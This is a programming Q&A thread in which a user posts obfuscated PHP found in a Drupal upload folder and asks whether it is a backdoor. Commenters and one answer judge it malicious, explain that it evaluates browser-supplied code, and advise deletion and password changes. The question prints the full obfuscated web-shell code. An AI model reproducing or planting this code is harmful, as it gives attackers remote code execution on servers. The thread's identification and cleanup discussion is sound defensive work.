# Found this code on a server and can't figure out if it's malicious?

Tags: php, security, exploit

This is the code:

```
<?php

    $mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
    $tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
    $lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb@:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'@)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]@[7hXC"S
    $tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
    $kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U@ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O@*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK@_(8ocvKR=II@F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7@%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*@,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^@L9XHqE?2Vyn0mO#UT@Ez';$mynbq='5XNBz@';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD@t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
    ##_W}8|bSK^C#$J..a5:]s(
    $sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt@GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|@o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
    'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O@f_IU^5WTG"tS!/
    $wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y@pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh@DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
    $kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a@j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD#@5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X@w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R@%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
    $ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3@?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
    $flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
    $ryy='q0ht@';##rt3I]{hp6$AWo7yb@|xKCPo?VBY$[{[
    $lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
    /*[SXl3i[@y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';

?>
```

I've tried figuring out what it means or what it's trying to do, but I think it might be a bit over my head. Can anyone tell me if this is in fact a malicious backdoor script that founds it's way onto the server?

**UPDATE**

I found this code in sites/default/files in a drupal installation. Luckily you can't execute PHP from that folder, but it means a "normal" or "anonymous" user tried to upload this.

Comment: If you don't know what it is and you didn't add it, then just remove it. But then also check all other files and change all passwords (FTP, SSH, SQL...).

Comment: I think that the reasons for obscuring code are heavily weighted towards to "malicious" end - nuke it

Comment: @RobbieAverill you shoul add security tag too

Comment: This was a file that came along with a previous system. And I have removed it. But I would like to understand the code a bit better, so I can have some kind of idea of what was affected when this malicious script did potentially work at some stage.

Comment: @RobbieAverill Obscuring code won't lead to strings with arbitrarily content.

Comment: @CharlotteDunois I should have said "obfuscate"

Comment: Can't see anything malicious in it but I noticed it's also making calls to variables that aren't present in the code

Comment: Bankzilla, that's a good point! I found this in a Drupal site.

Comment: For an example `$flzrk($qmdr,$nnxk)` none of these variables are available in the code above

Answer (score 0):

It is malicious alright, however it dynamically evaluates code supplied by the browser so we cannot determine what has been executed against it. It is possible it was using in a file include attack so being able to execute php in it's stored location matters little.